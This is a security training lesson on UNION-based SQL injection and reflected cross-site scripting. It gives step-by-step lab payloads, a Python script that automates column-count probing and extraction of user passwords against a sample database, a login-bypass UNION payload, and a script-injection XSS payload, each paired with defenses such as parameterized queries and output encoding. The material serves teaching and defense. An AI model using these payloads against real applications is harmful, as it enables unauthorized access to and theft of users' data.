SQL Injection
UNION-Based Injection
UNION is an operator in SQL that combines the result sets of two or more SELECT statements into a single result set. It is commonly used in SQL injection attacks to extract information from other tables when the injectable query is itself a SELECT, because the rows of the injected SELECT are returned together with the legitimate results.
The following query returns a single row (table1 has one row in this example):
SELECT column1 FROM table1
This next query appends the result of a second SELECT to the first, so it returns two rows:
SELECT column1 FROM table1 UNION SELECT 1
In this case the last row shows 1, because the second SELECT only selects a constant value. You can substitute the 1 with a column from any other table and its values will come back in the same column.
Note: In order for the UNION to function correctly, the following must be true:
- The SELECT statement within the UNION must return the same number of columns as the first SELECT statement.
- The columns must have compatible data types, in the same order.
Reconnaissance
Click on the Projects menu to see a list of existing company projects. You will see that each project contains the name and description of the project. At the top right of the menu bar, enter a project ID from the list in the text box and select View Project. This will show full details of the project on a single page.
Enter the following payload into the Enter Project ID field and select View Project.
1 or 1=1
The page now returns every project, which means this field is vulnerable to injection. The input above produces the following query:
SELECT * FROM projects WHERE id = 1 or 1=1
We can use the UNION operator to extract additional database information so that it is returned alongside the project data.
Weaponization and Delivery
As mentioned, the SELECT statement within the UNION must have the same number of columns as the first SELECT statement, so we first need to find out how many columns the original statement requests.
Start with a single column in the UNION SELECT statement and increment from there. For example:
1 UNION SELECT 1
You should receive a 500 response from the server due to the mismatched column count.
Continue to increment the number of columns in the UNION SELECT.
1 UNION SELECT 1, 2
And then:
1 UNION SELECT 1, 2, 3
Repeat until you no longer receive the Internal Server Error.
Exploitation
There are seven columns in the original SELECT statement, so the working payload is:
1 UNION SELECT 1, 2, 3, 4, 5, 6, 7
Instead of counting up from 1, you may also have noticed that seven fields are shown for each project on the page (ID, Project Name, Description, Start Date, End Date, Project Type, Owner), so you could have started at 7. Treat that as a hint rather than a rule: the query may select columns that are never displayed, so the count still has to be confirmed with a payload that returns without an error.
Now that you have the number of columns you can start extracting other information from the database.
For example, MySQL exposes a system variable named @@version that returns the database server's version string. Enter the following payload into the Enter Project ID field:
1 UNION SELECT @@version, 2, 3, 4, 5, 6, 7
The version string is displayed in place of the project ID, because @@version occupies the first column of the injected row.
Now, try to extract some information about the users. The solution is on the next page.
Exploitation
To retrieve user information, you could use the following as the value of the Project ID field:
1 UNION SELECT user_id, user_name, password, 4, 5, 6, 7 FROM users
Observe that you need both the table name and the column names in order to perform the UNION injection. There are a couple of ways to obtain them:
- Make an educated guess: start with commonly used names for tables and columns (users, user_name, password).
- SQL injection: for harder-to-guess table and column names, use the techniques described in SQL Injection: Part 2 to iterate through and extract the database's schema information.
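The following is an added, runnable walkthrough of the reconnaissance, column-count probing and extraction steps above. It is example code written for this page, not code from the lesson or its target application. It uses Python's sqlite3 module in place of the lab's MySQL database so that it runs offline, with a constructed projects table that has the same seven columns as the lab and a constructed users table; the table and column names are taken from the lesson's payloads, and sqlite_version() stands in for MySQL's @@version.

```python
import sqlite3

# Constructed sample schema standing in for the lab's MySQL database.
# sqlite3 is used so the example runs offline; the SQL the payloads rely on
# (UNION, constant SELECTs, string concatenation) behaves the same in MySQL.
SCHEMA = """
CREATE TABLE projects (
    id INTEGER, name TEXT, description TEXT, start_date TEXT,
    end_date TEXT, project_type TEXT, owner TEXT
);
INSERT INTO projects VALUES
    (1, 'Payroll', 'Payroll system migration', '2023-01-01', '2023-06-30', 'internal', 'alice'),
    (2, 'Website', 'Marketing site refresh', '2023-03-01', '2023-09-30', 'external', 'bob');
CREATE TABLE users (user_id INTEGER, user_name TEXT, password TEXT);
INSERT INTO users VALUES (1, 'alice', 'S3cret!'), (2, 'bob', 'hunter2');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def view_project(conn, project_id):
    """The vulnerable 'View Project' lookup: the text-box value is concatenated
    straight into the statement, exactly as the lesson's query shows."""
    sql = "SELECT * FROM projects WHERE id = " + project_id
    return conn.execute(sql).fetchall()


def find_column_count(conn, max_columns=20):
    """Weaponization: grow the UNION SELECT column list until the database stops
    rejecting the statement (the lesson's HTTP 500) and return that count."""
    for n in range(1, max_columns + 1):
        constants = ", ".join(str(i) for i in range(1, n + 1))
        try:
            view_project(conn, f"1 UNION SELECT {constants}")
            return n
        except sqlite3.Error:
            continue  # column-count mismatch; try one more column
    return None


def injected_rows(rows):
    """Injected rows carry the constant 4 in the fourth column, while the real
    project row has a date there. Filtering on it avoids relying on the order
    in which UNION returns rows (assumes the query has at least four columns)."""
    return sorted(r for r in rows if r[3] == 4)


def extract_version(conn, ncols):
    """Exploitation: put a function call in the first column and pad the rest.
    MySQL would use @@version here; sqlite_version() is the SQLite equivalent."""
    padding = ", ".join(str(i) for i in range(2, ncols + 1))
    rows = view_project(conn, f"1 UNION SELECT sqlite_version(), {padding}")
    return injected_rows(rows)[0][0]


def extract_users(conn, ncols):
    """Exploitation: select real columns from the users table into the first
    three positions and pad the remaining ones so the column counts still match."""
    padding = ", ".join(str(i) for i in range(4, ncols + 1))
    payload = f"1 UNION SELECT user_id, user_name, password, {padding} FROM users"
    return [(r[0], r[1], r[2]) for r in injected_rows(view_project(conn, payload))]


if __name__ == "__main__":
    conn = connect()
    print(view_project(conn, "1 or 1=1"))   # reconnaissance: every project comes back
    ncols = find_column_count(conn)         # 7 for this schema
    print(extract_version(conn, ncols))
    print(extract_users(conn, ncols))
```

Running the file prints both projects for the `1 or 1=1` probe, finds seven columns after six failed attempts, and then returns the server version and the user rows through the same Project ID parameter. The only thing the real lab adds is HTTP in front of the query: each sqlite3.Error caught in find_column_count corresponds to one Internal Server Error page.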
Defense
The SQL injection techniques used in this lesson take more work and nuance on the attacker's side than a simple OR 1=1, but the outcome can be just as devastating: the attacker can still extract data from the database.
To protect against these SQL injection attacks:
- Validate all input data, ideally with an allowlist on the server side.
- Always enforce least privilege: the MySQL account the application connects with should hold only the privileges its queries actually need, so that even a successful injection cannot read or modify unrelated tables.
- Use parameterized queries for SQL statements.
C#
using MySql.Data.MySqlClient;

string sql = "SELECT user_id FROM users WHERE user_name = @username AND password = @password;";
using (MySqlCommand cmd = new MySqlCommand(sql, conn))
{
    // Bind the user-supplied values as parameters: the driver sends them
    // separately from the statement text, so they can never change the query.
    cmd.Parameters.AddWithValue("@username", username);
    cmd.Parameters.AddWithValue("@password", password);
    cmd.Prepare();
    using (MySqlDataReader rdr = cmd.ExecuteReader())
    {
        // rdr.Read() yields the matching user_id, if any
    }
}
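To make the difference concrete, here is an added example (not code from the lesson) of the same login query written both ways in Python against an in-memory sqlite3 table, with the lesson's UNION trick aimed at the password field. The users table, its rows and the payload are constructed for the example; in MySQL Connector/Python the placeholder would be %s rather than ?, and in the C# snippet above it is the named @parameter, but the mechanism is the same.

```python
import sqlite3


# Constructed users table matching the login query in the C# snippet above.
def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (user_id INTEGER, user_name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'S3cret!'), (2, 'bob', 'hunter2');
    """)
    return conn


def login_vulnerable(conn, username, password):
    """Before: the values are spliced into the statement text, so a quote in
    the input ends the string literal and everything after it is parsed as SQL."""
    sql = ("SELECT user_id FROM users WHERE user_name = '" + username
           + "' AND password = '" + password + "'")
    return [r[0] for r in conn.execute(sql).fetchall()]


def login_parameterized(conn, username, password):
    """After: placeholders. The statement is compiled first and the values are
    bound afterwards, so they are only ever compared against, never parsed."""
    sql = "SELECT user_id FROM users WHERE user_name = ? AND password = ?"
    return [r[0] for r in conn.execute(sql, (username, password)).fetchall()]


# Constructed attacker input: closes the password literal and appends a UNION
# that dumps every user_id, the same technique the lesson used against projects.
UNION_PAYLOAD = "' UNION SELECT user_id FROM users WHERE '1'='1"


if __name__ == "__main__":
    conn = connect()
    print(login_vulnerable(conn, "alice", UNION_PAYLOAD))      # every user_id
    print(login_parameterized(conn, "alice", UNION_PAYLOAD))   # no match
```

The vulnerable version returns every user_id because the payload turns the WHERE clause into `... AND password = '' UNION SELECT user_id FROM users WHERE '1'='1'`; the parameterized version returns nothing because the whole payload is compared against the password column as an ordinary string.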
Reflected Cross-Site Scripting (XSS)
Introduction
In this lesson we will look at how to exploit and remediate a Reflected Cross-Site Scripting vulnerability. A Reflected Cross-Site Scripting vulnerability occurs when data from a user's request is returned in a page context where it is treated as code and executed in the user's browser.
Cross-Site Scripting is a type of code injection vulnerability, where data is accidentally treated as code by the browser. To exploit it, we have to find a part of the application that will reflect user input into the HTML output. To fix a Cross-Site Scripting vulnerability you must find the location in the code where the attacker controlled data is being mixed with the HTML, determine the context of that portion of the HTML, and apply the proper defense for that HTML context.
Security folks will often refer to the three main types of Cross-Site Scripting as: Reflected, Stored and DOM Based. Another way to label these vulnerabilities is using the location where the data is mixed with code, which would give us Client Cross-Site Scripting or Server Cross-Site Scripting. The vulnerability in this application is a Reflected Server Cross-Site Scripting vulnerability because the attacker controlled data will be mixed with the HTML on the server before sending it to the browser.
Let's take a look at how we can exploit the security bug in this application.
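As an added example (not code from the lesson's application), the following Python shows what "treated as code" and "the proper defense for that HTML context" mean in practice. A constructed request parameter is reflected server-side into three different contexts of one page; the fixed version encodes the same value differently for each. It goes slightly beyond the lesson text by including a JavaScript string context, where HTML entity encoding is the wrong tool. The page layout, the parameter name q and the payload are all assumptions made for the example.

```python
import html
import json

# Constructed attacker-controlled request parameter, e.g. ?q=<payload> in the URL.
PAYLOAD = '"><script>alert(1)</script>'


def results_page_vulnerable(query):
    """Reflected XSS: the request parameter is concatenated into the HTML in three
    contexts (element body, attribute value, JavaScript string) without encoding,
    so the browser parses the payload as markup and script in each of them."""
    return (
        f"<h1>Results for {query}</h1>"
        f'<input name="q" value="{query}">'
        f'<script>var lastQuery = "{query}";</script>'
    )


def for_js_string(value):
    """JavaScript string-literal context: emit a JSON string literal, with < and >
    additionally written as \\u003c / \\u003e so that a </script> inside the data
    cannot terminate the script element before the JavaScript parser sees it."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def results_page_fixed(query):
    """Fix applied at the point where data meets HTML, chosen per context."""
    # html.escape encodes & < > " and ', which covers the element body and a
    # quoted attribute value (the quotes are what stop the attribute from closing).
    safe_html = html.escape(query)
    return (
        f"<h1>Results for {safe_html}</h1>"
        f'<input name="q" value="{safe_html}">'
        f"<script>var lastQuery = {for_js_string(query)};</script>"
    )


if __name__ == "__main__":
    print(results_page_vulnerable(PAYLOAD))
    print(results_page_fixed(PAYLOAD))
```

In the vulnerable output the payload's `">` closes the input tag and its `</script>` closes the script element, after which `<script>alert(1)</script>` runs in the user's browser. In the fixed output the markup survives only as entities in the HTML contexts and as `\u003c`/`\u003e` escapes inside the JavaScript string, so exactly one `</script>` (the page's own) remains.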